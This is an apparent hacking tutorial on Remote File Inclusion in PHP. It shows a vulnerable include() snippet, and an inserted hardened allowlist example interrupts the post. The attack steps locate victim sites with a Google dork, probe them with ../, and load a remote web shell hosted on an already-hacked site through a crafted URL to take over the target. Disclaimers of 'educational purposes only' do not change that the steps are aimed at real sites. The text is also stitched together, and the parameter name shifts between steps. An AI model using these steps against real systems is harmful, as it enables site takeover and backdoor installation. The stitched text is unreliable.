Remote File Inclusion (RFI) is a type
of vulnerability found in some websites.
It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to
the use of user-supplied input without proper validation. This can lead
to code execution on the web server.
The main cause
is the use of unvalidated external variables, most
notably in the include statement.
The vulnerable code looks like:
<?php
// The user-controlled page parameter is passed straight to include() with no validation.
include($_GET['page']);
?>
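A hardened counterpart to the snippet above, as an added example that is not code from the original post: the page value is only ever used as a key into a fixed allowlist, so neither ../ nor a URL can reach include. The page names and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based replacement for include($_GET['page']).
// PAGE_DIR and the entries in PAGES are assumptions, not from the post.
// Defense in depth: keep allow_url_include = Off in php.ini (the default).

const PAGE_DIR = __DIR__ . '/pages';

// Accepted ?page= values mapped to files that ship with the application.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to a local file path.
 * Returns null for anything that is not an exact allowlist key.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-string input are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // The path is built from our own constants, never from the request.
    return PAGE_DIR . '/' . PAGES[$requested];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the kinds of values the post uses, plus one valid name.
    foreach (['../', 'http://www.site.com/shell.txt', 'about'] as $value) {
        printf("%-32s => %s\n", $value, resolve_page($value) ?? 'rejected');
    }
    exit(0);
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```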
To attack, what you do is search for a site.
Example: using the Google dork inurl:php?page= or something
similar. The URL should be like:
www.site.com/somefile.php?page=www.somesite.com
Well, we won't find RFI-vulnerable sites these days; you
may find 1 or 2 in a million, or maybe not. This is for educational purposes only, but
I will be explaining it to you with screenshots.
Step 1: Find the vulnerable site.
Then place ../ at the end of the URL (remove the
content in page=), like this:
Ex: www.site.com/somefile.php?page=../
If it shows some kind of error like:
Warning: file(../) [function.file]:
failed to open stream: Permission denied in\\systemname\users\ in
line.
Then it is vulnerable to RFI: the error shows that the page value is passed to a file function without validation.
Sometimes, if you are lucky, you can check directly by
inserting another URL.
Ex: www.site.com/file.php?page=www.google.com
That's it. Now, to take over this site, all you need is
a shell. A shell is like an unauthorized
backdoor control panel for a website, and it should have the .txt extension.
(* I'm not responsible for any of your actions;
for educational purposes only. *)
Now put it in the URL like this: www.site.com/file.php?id=http://www.site.com/shell.txt
This shell.txt comes from another site which you have
already hacked and uploaded the .txt file to.
You will find something like this: tada!